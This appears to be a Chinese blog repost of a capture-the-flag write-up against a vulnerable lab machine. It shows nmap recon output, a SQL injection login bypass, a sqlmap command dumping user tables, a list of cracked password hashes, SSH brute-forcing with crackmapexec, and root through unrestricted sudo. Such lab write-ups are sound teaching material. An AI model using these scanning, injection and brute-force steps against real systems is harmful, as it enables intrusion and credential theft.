当前位置：首页 > news >正文

CTF 7

news 文章来源：https://blog.csdn.net/weixin_44770698/article/details/134839818 2024/9/22 15:50:41

信息收集

存活主机探测
arp-scan -l
端口探测
nmap -sT --min-rate 10000 -p- 192.168.0.5
服务版本等信息
nmap -sT -sV -sC -O -p22,80,137,138,139,901,5900,8080,10000 192.168.0.5Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 21:23 CST
Stats: 0:01:30 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.88% done; ETC: 21:24 (0:00:00 remaining)
Nmap scan report for 192.168.0.5
Host is up (0.00053s latency).PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 41:8a:0d:5d:59:60:45:c4:c4:15:f3:8a:8d:c0:99:19 (DSA)
|_  2048 66:fb:a3:b4:74:72:66:f4:92:73:8f:bf:61:ec:8b:35 (RSA)
80/tcp    open   http        Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Mad Irish Hacking Academy
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open               Samba smbd 3.5.10-125.el6 (workgroup: MYGROUP)
901/tcp   open   http        Samba SWAT administration server
|_http-title: 401 Authorization Required
| http-auth: 
| HTTP/1.0 401 Authorization Required\x0D
|_  Basic realm=SWAT
5900/tcp  closed vnc
8080/tcp  open   http        Apache httpd 2.2.15 ((CentOS))
|_http-server-header: Apache/2.2.15 (CentOS)
| http-title: Admin :: Mad Irish Hacking Academy
|_Requested resource was /login.php
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-open-proxy: Proxy might be redirecting requests
10000/tcp open   http        MiniServ 1.610 (Webmin httpd)
|_http-title: Login to Webmin
| http-robots.txt: 1 disallowed entry 
|_/
MAC Address: 00:0C:29:55:3E:AE (VMware)
Device type: general purpose|webcam|storage-misc|media device|WAP
Running (JUST GUESSING): Linux 2.6.X|3.X|4.X (97%), Tandberg embedded (91%), Drobo embedded (90%), HP embedded (89%), Infomir embedded (89%), Ubiquiti embedded (89%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:drobo:5n cpe:/h:hp:p2000_g3 cpe:/h:infomir:mag-250 cpe:/o:linux:linux_kernel:2.6.32 cpe:/h:ubnt:airmax_nanostation
Aggressive OS guesses: Linux 2.6.32 - 3.13 (97%), Linux 2.6.39 (96%), Linux 2.6.32 - 3.10 (94%), Linux 2.6.32 (92%), Linux 3.2 - 3.8 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Tandberg Video Conference System (91%), Linux 2.6.32 - 3.1 (91%), Linux 2.6.32 - 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hopHost script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.5.10-125.el6)
|   Computer name: localhost
|   NetBIOS computer name: 
|   Domain name: 
|   FQDN: localhost
|_  System time: 2023-10-18T11:05:11-04:00
|_clock-skew: mean: -14d20h18m29s, deviation: 2h49m45s, median: -14d22h18m32s
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.19 seconds漏洞脚本探测
nmap -sT --script=vuln -p22,80,137,138,139,901,5900,8080,10000 192.168.0.5Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 21:23 CST
Nmap scan report for 192.168.0.5
Host is up (0.00047s latency).PORT      STATE  SERVICE
22/tcp    open   ssh
80/tcp    open   http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|     Couldn't find a file-type field.
|
|     Couldn't find a file-type field.
|
|_    Couldn't find a file-type field.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|   /webmail/: Mail folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|   /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|_  /webalizer/: Potentially interesting folder
|_http-trace: TRACE is enabled
137/tcp   closed netbios-ns
138/tcp   closed netbios-dgm
139/tcp   open   netbios-ssn
901/tcp   open   samba-swat
5900/tcp  closed vnc
8080/tcp  open   http-proxy
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|_      httponly flag not set
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-trace: TRACE is enabled
| http-enum:
|   /login.php: Possible admin folder
|   /phpmyadmin/: phpMyAdmin
|   /docs/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
|   /icons/: Potentially interesting folder w/ directory listing
|_  /inc/: Potentially interesting directory w/ listing on 'apache/2.2.15 (centos)'
10000/tcp open   snet-sensor-mgmt
MAC Address: 00:0C:29:55:3E:AE (VMware)Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos:
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_
| smb-vuln-cve2009-3103:
|   VULNERABLE:
|   SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2009-3103
|           Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
|           Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
|           denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
|           PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
|           aka "SMBv2 Negotiation Vulnerability."
|
|     Disclosure date: 2009-09-08
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103Nmap done: 1 IP address (1 host up) scanned in 99.16 seconds

综上靶机的版本信息可能是linux系统，突破点端口优先级：80 8080 10000

Web渗透

80

先看看80端口上的服务：

存在很多的功能点，依次的点击看看：

很多的功能点，都需要进行注册才可以。根据上面的信息收集，发现了两个目录，看起来比较可疑，可能存在漏洞，尝试访问/webmail和/webalizer：

登陆界面！看起来很像是后台的管理员界面！尝试在线收集相关弱口令！

（这里我进行了爆破，速度实在是过于缓慢了，没耐心了，可能没什么漏洞，后面找不到在回来看吧）

webalizer的版本号泄露给我们，在线查询相关漏洞，好像并没有什么漏洞，这个貌似是流量的管理平台。

8080

又一个登录的界面，看起来也很像后台的登录界面，一般我在遇到这种情况下，都会先试试常见的几个弱口令，然后抓包看看是不是明文传输，如果是的话，那就是可以进行爆破的！以及sql注入！

我们先抓包，看看能不能进行爆破，试了几个弱口令，并没有成功的登陆进去。

虽然发现了数据包中的账号和密码是明文传输的，但是我还发现了响应包中怎么还有查询语句？？？直接尝试闭合！

尝试利用万能密码进行登录：

登陆成功：

去sqlmap跑一下吧：

python sqlmap.py -r 1.txt -dbs -dump -batch

成功发现了users表中的各个用户的加密密码：可以尝试去在线破解一波！（当然这里的sqlmap已经给我们破解了几个）

e22f07b17f98e0d9d364584ced0e3c18（my2cents） brian@localhost.localdomain
0d9ff2a4396d6939f80ffe09b1280ee1（transformersrule） john@localhost.localdomain
2146bf95e8929874fc63d54f50f1d2e3（turtles77） alice@localhost.localdomain
9f80ec37f8313728ef3e2f218c79aa23（Shelly2012） ruby@localhost.localdomain
5d93ceb70e2bf5daa84ec3d0cd2c731a (qwer1234) leon@localhost.localdomain
ed2539fe892d2c52c42a440354e8e3d5 (madrid) julia@localhost.localdomain
9c42a1346e333a770904b2a2b37fa7d3 (somepassword) michael@localhost.localdomain
3a24d81c2b9d0d9aaf2f10c6c9757d4e（LosAngelesLakers） bruce@localhost.localdomain
4773408d5358875b3764db552a29ca61（Jets4Ever）neil@localhost.localdomain
b2a97bcecbd9336b98d59d9324dae5cf（chuck33）charles@localhost.localdomain
4cb9c8a8048fd02294477fcb1a41191a (changeme) foo@bar.com
098f6bcd4621d373cade4e832627b4f6 (test) test@nowhere.com

上面是我在线破解出来的密码和sqlmap自动解密出来的密码，进行了相关的整理，不知道能不能用到！感觉可以直接试试ssh！（这里我先不尝试，为啥？因为刚才在浏览各个功能的时候，发现一个文件上传的地方）

当然选择Add new也是可以：

我们先试试随便上传一个文件，利用BP进行重放测试：

是传上去了，但是没有回显的路径，不知道传到那里了。。。换个账号能不能看到呢？（发现也是看不到，而且不是admin权限的账号进行登录的时候，登陆不成功），回到了上传的界面，尝试在作者和描述功能框中，写php代码，重新上传，出现了目录：

判断这可能就是上传的路径，但是文件名还是不知道的，猜测还是我们上传的原文件！（还是访问不到~）

我一直访问不到，难道是浏览器的原因？换成firefox之后，还是not found~

感觉这里只要能访问到，肯定是直接上传文件，或者是绕过上传的限制，但是我上传了一个txt文件，并没有相关的限制~~

SSH

看看SSH能不能登陆吧：

利用crackmapexec工具

CrackMapExec提供了域环境（活动目录）渗透测试中一站式便携工具，它具有列举登录用户、通过SMB(Server Message Block)网络文件共享协议爬虫列出SMB分享列表。

看看具体的用法：

因为是对ssh进行爆破，所以后面接上ssh后，继续-h

-u接用户名的文件，-p接密码的文件！

用户名字段：

密码文件：

crackmapexec ssh 192.168.0.5 -u username -p pass

发现真的存在ssh账户和密码，接下来就是登陆了！

成功拿到了初始的权限，接下来就是提权！

提权

查看初始的权限

两个ALL？那不就是root？

完事！（PS：10000端口都没用到，当时我还看了下，这个webmin他是存在命令执行的！！没再测试）

CTF 7

信息收集存活主机探测 arp-scan -l 端口探测 nmap -sT --min-rate 10000 -p- 192.168.0.5 服务版本等信息 nmap -sT -sV -sC -O -p22,80,137,138,139,901,5900,8080,10000 192.168.0.5Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-02 21:23 CST Stats: 0:01:30 elaps…...

编程日记 2023/12/7 20:09:39

无公网IP环境Windows系统使用VNC远程连接Deepin桌面

🔥博客主页： 小羊失眠啦. 🎥系列专栏：《C语言》《数据结构》《Linux》《Cpolar》 ❤️感谢大家点赞👍收藏⭐评论✍️ 前些天发现了一个巨牛的人工智能学习网站，通俗易懂，风趣幽默，…...

编程日记 2023/12/7 20:01:33

java--枚举

1.枚举枚举是一种特殊类 2.枚举类的格式注意： ①枚举类中的第一行，只能写一些合法的标识符(名称)，多个名称用逗号隔开。 ②这些名称，本质是常量，每个常量都会记住枚举类的一个对象。 3.枚举类的特点 ①枚举类的…...

编程日记 2023/12/7 20:00:32

JVM垃圾回收机制GC

一句话介绍GC： 自动释放不再使用的内存一、判断对象是否能回收思路一：引用计数给这个对象里安排一个计数器， 每次有引用指向它， 就把计数器1， 每次引用被销毁，计数器-1，当计数器为0的时候…...

编程日记 2023/12/7 19:59:31

详解JAVA中的@ApiModel和@ApiModelProperty注解

目录前言1. ApiModel注解2. ApiModelProperty注解3. 实战前言在Java中，ApiModel和ApiModelProperty是Swagger框架（用于API文档的工具）提供的注解，用于增强API文档的生成和展示。这两者搭配使用更佳使用两者注解，…...

编程日记 2023/12/7 19:55:28

TiDB专题---2、TiDB整体架构和应用场景

上个章节我们讲解了TiDB的发展和特性，这节我们讲下TiDB具体的架构和应用场景。首先我们回顾下TiDB的优势。 TiDB的优势与传统的单机数据库相比，TiDB 具有以下优势： 纯分布式架构，拥有良好的扩展性，支持弹性的扩缩容…...

编程日记 2023/12/7 19:54:25

性能调优入门

从公众号转载，关注微信公众号掌握更多技术动态 --------------------------------------------------------------- 一、性能定律和数理基础 1.三个定律法则 (1)帕累托法则我它也被称为 80/20 法则、关键少数法则，或者八二法则。人们在生活中发现很多…...

编程日记 2023/12/7 19:52:23

JavaWeb | 验证码、文件的“上传”与“下载”

目录： 验证码和文件的“上传”与“下载”1.验证码1.1在JSP上开发验证码 2.“文件上传” 和 “文件下载”2.1“文件上传 ”2.2“文件下载” 验证码和文件的“上传”与“下载” 1.验证码验证码：就是由服务器生成的一串随机数字或符号形成一幅图片&am…...

编程日记 2023/12/7 19:51:23

服务器感染了.halo勒索病毒，如何确保数据文件完整恢复？

导言： 随着科技的不断发展，网络安全问题日益突出，而.halo勒索病毒正是这个数字时代的一大威胁。本文将深入介绍.halo勒索病毒的特点，解释在受到攻击后如何有效恢复被加密的数据文件，并提供一些建议以预防未来可能的威…...

编程日记 2023/12/7 19:50:22

docker安装elasticsearch8.5.0和kibana

服务器环境，centos7 一、安装elasticsearch 1. 创建一个es和kibana通用的网络 docker network create es-net 2. 拉取es镜像，这里选择8.5.0版本 docker pull elasticsearch:8.5.03. 创建挂载目录，并授权 mkdir /usr/local/install/ela…...

编程日记 2023/12/7 19:49:21

如何使用内网穿透工具实现公网访问GeoServe Web管理界面

文章目录前言1.安装GeoServer2. windows 安装 cpolar3. 创建公网访问地址4. 公网访问Geo Servcer服务5. 固定公网HTTP地址6. 结语前言 GeoServer是OGC Web服务器规范的J2EE实现，利用GeoServer可以方便地发布地图数据，允许用户对要素数据进行更新、删除…...

编程日记 2023/12/7 19:48:20

koa2项目中封装log4js日志输出

1.日志输出到控制台 npm i log4js -D 封装log4js文件： 注意：每次都要重新获取log4js.getLogger(debug)级别才能生效 const log4js require("log4js");const levels {trace: log4js.levels.TRACE,debug: log4js.levels.DEBUG,info: log4js.…...

编程日记 2023/12/7 19:47:19

C# WPF上位机开发（抽奖软件）

编程日记 2023/12/7 19:44:17

搭建部署Hadoop2.x和3.x的区别

文章目录 2.x 和 3.x 的区别Java最小支持版本常用的端口号配置文件Classpath隔离NodeManager重连进入官网自行查阅 2.x 和 3.x 的区别 Java最小支持版本 Hadoop 2.x：2.7 版本需要 Java 7，2.6 以及更早期版本支持 Java 6Hadoop 3.x：最低要求…...

编程日记 2023/12/7 19:42:15

Java爬虫攻略：应对JavaScript登录表单

问题背景在进行网络抓取数据时，经常会遇到需要登录的网站，特别是使用JavaScript动态生成登录表单的情况。传统的爬虫工具可能无法直接处理这种情况，因此需要一种能够模拟用户行为登录的情况解决方案。在实际项目中，我们可能需要…...

编程日记 2023/12/7 19:41:14

基于单片机的电子密码锁设计

1．设计任务利用AT89C51单片机为核心控制元件,设计一个简易的电子密码锁，可设置四位密码，输入错误三次，报警灯亮起（红灯亮起），输入正确，绿灯闪烁三次。可通过LCD显示屏查看密码&…...

编程日记 2023/12/7 19:40:13

ChatGPT学习笔记

1 ChatGPT架构图 （ChatGPT_Diagram.svg来自于【OpenA | Introducing ChatGPT】） 2 模型训练 ChatGPT在训练时使用了PPO方法；...

编程日记 2023/12/7 19:37:09

One-to-Few Label Assignment for End-to-End Dense Detection阅读笔记

One-to-Few Label Assignment for End-to-End Dense Detection阅读笔记 Abstract 一对一（o2o）标签分配对基于变换器的端到端检测起着关键作用，最近已经被引入到全卷积检测器中，用于端到端密集检测。然而，o2o可能因为…...

编程日记 2023/12/7 19:36:09

Ubuntu22.04 使用Docker部署Neo4j出错 Exited(70)

项目场景： 最近需要使用Neo4j图数据库，因此打算使用docker部署环境使用WSL Ubuntu22.04 问题描述拉下最新Neo4j镜像，执行命令部署启动容器脚本 docker run -d -p 7474:7474 -p 7687:7687 \ --name neo4j \ --env "NEO4J_AUTHneo…...

编程日记 2023/12/7 19:35:08

【数据分析 | Numpy】Numpy模块系列指南（一），从设计架构说起

🤵‍♂️ 个人主页: AI_magician 📡主页地址： 作者简介：CSDN内容合伙人，全栈领域优质创作者。 👨‍💻景愿：旨在于能和更多的热爱计算机的伙伴一起成长！！&…...

编程日记 2023/12/7 19:34:07

多人聊天室

多人聊天包由于要先创建服务面板，接收客户端连接的信息，此代码使用顺序为先启动服务端，在启动客户端，服务端不用关，不然会报错。多运行几次客户端，实现单人聊天 1.创建服务面板 package yiduiy;import j…...

编程日记 2023/12/7 19:33:05

智慧园区可视化综合管理平台建设方案，智能化、数字化才是关键

园区作为城市的基本单元，是经济发展的重要载体。随着我国经济的快速发展，各类工业园区、办公园区等园区的规划建设也越来越多。伴随着互联网新兴技术的发展和应用，智慧园区已成为当今城市规划和社会发展的关注焦点，今天我们来介绍…...

编程日记 2023/12/7 19:32:04

kepler.gl部署在线说明文档

1 概述 1.1 介绍 1、Kepler.gl 是一个强大的开源地理空间分析工具，用于大规模数据集的可视化。它由 Uber 的数据可视化团队开发，并且是基于 Web 技术构建的。Kepler.gl 涉及到以下几个主要技术领域： WebGL: Kepler.gl 通过 WebGL 进行渲染…...

编程日记 2023/12/7 19:28:01

Java程序员，你掌握了多线程吗？

文章目录 01 多线程对于Java的意义02 为什么Java工程师必须掌握多线程03 Java多线程使用方式04 如何学好Java多线程写作末尾摘要：互联网的每一个角落，无论是大型电商平台的秒杀活动，社交平台的实时消息推送，还是在线视频平台的流…...

编程日记 2023/12/7 19:25:59

Android 11.0 长按按键切换SIM卡默认移动数据

Android 11.0 长按按键切换SIM卡默认移动数据近来收到客户需求想要通过长按按键实现切换SIM卡默认移动数据的功能，该功能主要通过长按按键发送广播来实现，具体修改参照如下： 首先创建广播，具体修改参照如下： /vend…...

编程日记 2023/12/7 19:23:56

Kafka集群调优+能力探底

一、前言我们需要对4个规格的kafka能力进行探底，即其可以承载的最大吞吐；4个规格对应的单节点的配置如下： 标准版： 2C4G 铂金版： 4C8G 专业版： 8C16G 企业版： 16C32G 另外，一般…...

编程日记 2023/12/7 19:21:54

netcore swagger 错误 Failed to load API definition

后端接口报错如下： 前端nswag报错如下： 根据网上查询到的资料说明，说一般swagger这种错误都是控制器里有接口代码异常造成的，通常是接口没有加属性Attribute， 比如[HttpPost("Delete")]、[HttpGet("Del…...

编程日记 2023/12/7 19:19:52

UDP Socket API 的讲解，以及回显服务器客户端的实现

文章目录 UDPDatagramSocktet APIDatagramPacket API UDP 客户端服务器实现 UDP 先来认识一下 UDP 的 socket api，两个核心的类：DatagramSocket、DatagramPacket. DatagramSocktet API 是一个 socket 对象。什么是 socket？ 操作系统&…...

编程日记 2023/12/7 19:17:50

数据结构与算法-D7栈实现及应用

顺序栈具有顺序表同样的存储结构，由数组定义，配合用数组下标表示的栈顶指针top完成操作 sqstack.h stack_creat stack_push stack_empty stack_full 1、判断栈是否为空 2、top--，取：data[top1] stack_top stack_clear stack_fre…...

编程日记 2023/12/7 19:16:49

蓝桥杯真题:分巧克力(二分法)-Java版

由题目可知,该题的最终结果具有单调性,边长越大,可分蛋糕越少可以用二分模板的向右找: 整数二分 import java.io.BufferedReader; import java.io.IOException; import java.io.InputStreamReader;public class Main {static int n,k; //n个块蛋糕,k个学生static int N 10…...

编程日记 2023/12/7 19:12:47

c++面试题

1.static的使用 1）修饰局部变量：在函数内部使用static修饰局部变量，会使它成为静态局部变量。静态局部变量只会被初始化一次，且只有在第一次调用该函数时才会被初始化，之后每次调用该函数时都会保留上一次的值.从原来…...

编程日记 2023/12/7 19:08:43

高精度加法，减法，乘法，除法（上）（C语言）

前言加，减，乘，除这些运算我们自然信手捏来，就拿加法来说，我们要用c语言编程算ab的和，只需让sum ab即可，可是这是局限的，我们都知道int的表示的最大值为2147483647（32位…...

编程日记 2023/12/7 19:07:42

C++新经典模板与泛型编程：SFINAE特性的信息萃取

用成员函数重载实现is_default_constructible 首先介绍一个C标准库提供的可变参类模板std::is_default_constructible。这个类模板的主要功能是判断一个类的对象是否能被默认构造（所谓默认构造，就是构造一个类对象时，不需要给该类的构造函数…...

编程日记 2023/12/7 19:06:41

java单人聊天

服务端 package 单人聊天;import java.awt.BorderLayout; import java.awt.event.ActionEvent; import java.awt.event.ActionListener; import java.io.BufferedReader; import java.io.InputStream; import java.io.InputStreamReader; import java.io.OutputStream; import…...

编程日记 2023/12/7 19:04:39

nodejs环境安装

node安装 wget https://mirrors.tuna.tsinghua.edu.cn/nodejs-release/v20.8.0/node-v20.8.0-linux-x64.tar.gz tar xf node-v20.8.0-linux-x64.tar.xz -C /usr/local/ ln -s node-v20.8.0-linux-x64 nodevim /etc/profile.d/node.sh export PATH$PATH:/usr/local/node/binnp…...

编程日记 2023/12/7 19:03:38

信息收集

Web渗透

80

8080

SSH

提权

相关文章：